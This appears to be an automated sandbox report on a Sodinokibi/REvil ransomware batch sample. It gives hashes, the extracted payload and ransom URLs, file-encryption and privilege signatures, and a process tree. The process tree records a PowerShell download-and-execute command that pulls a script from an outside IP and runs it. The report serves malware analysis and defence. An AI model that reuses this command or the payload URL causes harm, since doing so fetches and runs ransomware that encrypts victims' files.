Analysis
- max time kernel: 137s
- max time network: 149s
- platform: windows10_x64
- resource: win10
- submitted: 15-09-2020 21:10
Static task: static1
Behavioral task: behavioral1
- Sample: ab140e9cdf481895e1fc3230b74a6163.bat
- Resource: win7
Behavioral task: behavioral2
- Sample: ab140e9cdf481895e1fc3230b74a6163.bat
- Resource: win10
General
- Target: ab140e9cdf481895e1fc3230b74a6163.bat
- Size: 222B
- MD5: 2c0b9ea7ff3eb83f39fbefb161432e0a
- SHA1: 660fc5ebdfc2b59488b46f4b4e05873d697a84e0
- SHA256: 765c8a1c379b68045e0723ad205edd2ebbdea57c003ec7fb78bb91868ff1d2bd
- SHA512: fb4b97e568e0e8204ec9039cbf8f6c808a0f96feca4ff85f2bfec2279e09f3f53a8373035669ee04cc239a10920c2d6864b59ae35eeac04e09384959c36e0577
Malware Config
Extracted
- http://185.103.242.78/pastes/ab140e9cdf481895e1fc3230b74a6163
Extracted
- C:\ihcc6n0-readme.txt
- sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0BB4174AE31E53C1
- http://decryptor.cc/0BB4174AE31E53C1
Signatures
- Sodin,Sodinokibi,REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (54 IoCs)
  Processes: powershell.exe
  flow / pid / process: all 54 network flows (9, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 39, 41, 43, 45, 47, 49, 51, 53, 55, 57, 59, 61, 63, 65, 67, 68, 70, 72, 74, 76, 78, 80, 82, 84, 86, 88, 90, 93, 95, 97, 99, 101, 103, 105, 107, 109, 111, 113, 115, 117) originate from pid 3768 powershell.exe
- Modifies extensions of user files (4 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
  description / ioc / process:
  File opened for modification: \??\c:\users\admin\pictures\OutSync.tiff (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\OptimizeDismount.png => \??\c:\users\admin\pictures\OptimizeDismount.png.ihcc6n0 (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\OutSync.tiff => \??\c:\users\admin\pictures\OutSync.tiff.ihcc6n0 (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\SubmitUnprotect.raw => \??\c:\users\admin\pictures\SubmitUnprotect.raw.ihcc6n0 (powershell.exe)
- Enumerates connected drives (3 TTPs, 25 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: powershell.exe
  description / ioc / process: File opened (read-only) by powershell.exe for each of \??\X:, \??\Z:, \??\B:, \??\F:, \??\I:, \??\L:, \??\Q:, \??\S:, \??\W:, \??\G:, \??\P:, \??\R:, \??\T:, \??\U:, \??\V:, \??\E:, \??\K:, \??\O:, \??\Y:, \??\A:, \??\H:, \??\J:, \??\M:, \??\N:, \??\D:
- Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe
  description / ioc / process:
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  description / ioc / process:
  Set value (str): \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\t714c678f.bmp" (powershell.exe)
- Drops file in Program Files directory (27 IoCs)
  Processes: powershell.exe
  description / ioc / process (all by powershell.exe):
  File opened for modification: \??\c:\program files\JoinFormat.svgz
  File opened for modification: \??\c:\program files\CompressComplete.vbs
  File opened for modification: \??\c:\program files\RedoUninstall.m3u
  File opened for modification: \??\c:\program files\RestartOut.ttf
  File opened for modification: \??\c:\program files\ExpandSync.xsl
  File opened for modification: \??\c:\program files\SplitPop.gif
  File opened for modification: \??\c:\program files\StartMerge.ex_
  File opened for modification: \??\c:\program files\UndoRead.aif
  File created: \??\c:\program files\ihcc6n0-readme.txt
  File created: \??\c:\program files (x86)\ihcc6n0-readme.txt
  File opened for modification: \??\c:\program files\InvokeCompress.eps
  File opened for modification: \??\c:\program files\TraceRename.png
  File opened for modification: \??\c:\program files\AssertCompare.gif
  File opened for modification: \??\c:\program files\GrantEnable.midi
  File opened for modification: \??\c:\program files\WaitSplit.m4a
  File opened for modification: \??\c:\program files\DebugSwitch.wmx
  File opened for modification: \??\c:\program files\DenyRestart.htm
  File opened for modification: \??\c:\program files\ResumeMount.mpp
  File opened for modification: \??\c:\program files\ProtectFind.snd
  File opened for modification: \??\c:\program files\ResizeSearch.3gp2
  File opened for modification: \??\c:\program files\AddCheckpoint.TS
  File opened for modification: \??\c:\program files\BlockConnect.jpeg
  File opened for modification: \??\c:\program files\BlockConnect.png
  File opened for modification: \??\c:\program files\SelectApprove.rle
  File opened for modification: \??\c:\program files\MountMeasure.ADTS
  File opened for modification: \??\c:\program files\PushRemove.cr2
  File opened for modification: \??\c:\program files\StopSend.emf
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe
  pid / process: 3768 powershell.exe (5 occurrences)
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes: powershell.exe, vssvc.exe
  description / pid / process:
  Token: SeDebugPrivilege, 3768 powershell.exe
  Token: SeDebugPrivilege, 3768 powershell.exe
  Token: SeTakeOwnershipPrivilege, 3768 powershell.exe
  Token: SeBackupPrivilege, 2060 vssvc.exe
  Token: SeRestorePrivilege, 2060 vssvc.exe
  Token: SeAuditPrivilege, 2060 vssvc.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: cmd.exe
  description / pid / process / target process: PID 3828 (cmd.exe) wrote to memory of 3768 (powershell.exe), recorded 3 times
Processes
- C:\Windows\system32\cmd.exe (depth 1)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ab140e9cdf481895e1fc3230b74a6163.bat"
  PID: 3828
  Signatures:
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ab140e9cdf481895e1fc3230b74a6163');Invoke-DFOZTCUZYBDAOQM;Start-Sleep -s 10000"
    PID: 3768
    Signatures:
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  PID: 2060
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken